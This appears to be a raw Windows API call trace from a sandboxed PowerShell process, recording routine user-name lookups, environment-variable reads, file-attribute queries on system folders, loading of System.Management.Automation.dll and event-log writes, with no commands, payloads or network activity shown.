	[0680.083] GetUserNameW (in: lpBuffer=0x3d5480, pcbBuffer=0x26d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d508) returned 1
	[0680.083] CoTaskMemFree (pv=0x3d5480) 
	[0680.084] ReportEventW (hEventLog=0x28a0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x311a7b0*="Certificate", lpRawData=0x311a540) returned 1
	[0681.460] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0681.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.460] CoTaskMemFree (pv=0x44be40) 
	[0681.464] GetLogicalDrives () returned 0x4
	[0681.464] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0681.464] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0681.465] CoTaskMemAlloc (cb=0x20e) returned 0x430f70
	[0681.465] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x430f70 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0681.465] CoTaskMemFree (pv=0x430f70) 
	[0681.466] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0681.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.467] CoTaskMemFree (pv=0x44be40) 
	[0681.467] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0681.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.467] CoTaskMemFree (pv=0x44be40) 
	[0681.484] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0681.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.484] CoTaskMemFree (pv=0x44be40) 
	[0681.486] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0681.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.486] CoTaskMemFree (pv=0x44be40) 
	[0681.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0681.487] SetErrorMode (uMode=0x1) returned 0x1
	[0681.487] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d110 | out: lpFileInformation=0x26d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0681.487] SetErrorMode (uMode=0x1) returned 0x1
	[0681.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0681.487] SetErrorMode (uMode=0x1) returned 0x1
	[0681.487] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d110 | out: lpFileInformation=0x26d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0681.487] SetErrorMode (uMode=0x1) returned 0x1
	[0681.488] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0681.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.488] CoTaskMemFree (pv=0x44be40) 
	[0683.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0683.181] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0683.181] SetErrorMode (uMode=0x1) returned 0x1
	[0683.181] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d0d0 | out: lpFileInformation=0x26d0d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0683.182] SetErrorMode (uMode=0x1) returned 0x1
	[0683.182] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0683.182] SetErrorMode (uMode=0x1) returned 0x1
	[0683.182] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d0d0 | out: lpFileInformation=0x26d0d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0683.182] SetErrorMode (uMode=0x1) returned 0x1
	[0683.182] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0683.182] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0683.182] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0683.182] SetErrorMode (uMode=0x1) returned 0x1
	[0683.183] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d0d0 | out: lpFileInformation=0x26d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0683.183] SetErrorMode (uMode=0x1) returned 0x1
	[0683.183] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0683.183] SetErrorMode (uMode=0x1) returned 0x1
	[0683.183] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d0d0 | out: lpFileInformation=0x26d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0683.183] SetErrorMode (uMode=0x1) returned 0x1
	[0683.183] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0683.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0683.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0683.184] SetErrorMode (uMode=0x1) returned 0x1
	[0683.184] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d0d0 | out: lpFileInformation=0x26d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0683.184] SetErrorMode (uMode=0x1) returned 0x1
	[0683.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0683.184] SetErrorMode (uMode=0x1) returned 0x1
	[0683.184] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d0d0 | out: lpFileInformation=0x26d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0683.184] SetErrorMode (uMode=0x1) returned 0x1
	[0683.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0683.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0683.185] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0683.185] SetErrorMode (uMode=0x1) returned 0x1
	[0683.185] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d110 | out: lpFileInformation=0x26d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0683.185] SetErrorMode (uMode=0x1) returned 0x1
	[0683.185] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0683.185] SetErrorMode (uMode=0x1) returned 0x1
	[0683.186] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d110 | out: lpFileInformation=0x26d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0683.186] SetErrorMode (uMode=0x1) returned 0x1
	[0683.186] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0683.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0683.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0683.186] SetErrorMode (uMode=0x1) returned 0x1
	[0683.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d110 | out: lpFileInformation=0x26d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0683.186] SetErrorMode (uMode=0x1) returned 0x1
	[0683.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0683.187] SetErrorMode (uMode=0x1) returned 0x1
	[0683.187] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d110 | out: lpFileInformation=0x26d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0683.187] SetErrorMode (uMode=0x1) returned 0x1
	[0683.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0683.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0683.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0683.196] SetErrorMode (uMode=0x1) returned 0x1
	[0683.196] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d3d0 | out: lpFileInformation=0x26d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0683.196] SetErrorMode (uMode=0x1) returned 0x1
	[0683.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0683.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0683.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0683.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0685.827] CoTaskMemAlloc (cb=0x804) returned 0x1ba7fd40
	[0685.827] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba7fd40, nSize=0x26d738 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d738) returned 0x1
	[0687.603] CoTaskMemFree (pv=0x1ba7fd40) 
	[0687.603] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0687.603] GetUserNameW (in: lpBuffer=0x3d5480, pcbBuffer=0x26d778 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d778) returned 1
	[0687.604] CoTaskMemFree (pv=0x3d5480) 
	[0687.605] ReportEventW (hEventLog=0x28a0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3153498*="Available", lpRawData=0x3153228) returned 1
	[0687.746] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0687.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0687.747] CoTaskMemFree (pv=0x44be40) 
	[0687.748] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0687.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0687.748] CoTaskMemFree (pv=0x44be40) 
	[0687.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.755] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0687.755] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0687.755] CoTaskMemFree (pv=0x44be40) 
	[0687.756] CoTaskMemAlloc (cb=0x104) returned 0x44be40
	[0687.756] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x44be40, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0687.756] CoTaskMemFree (pv=0x44be40) 
	[0687.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.758] GetCurrentProcessId () returned 0x10f8
	[0687.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
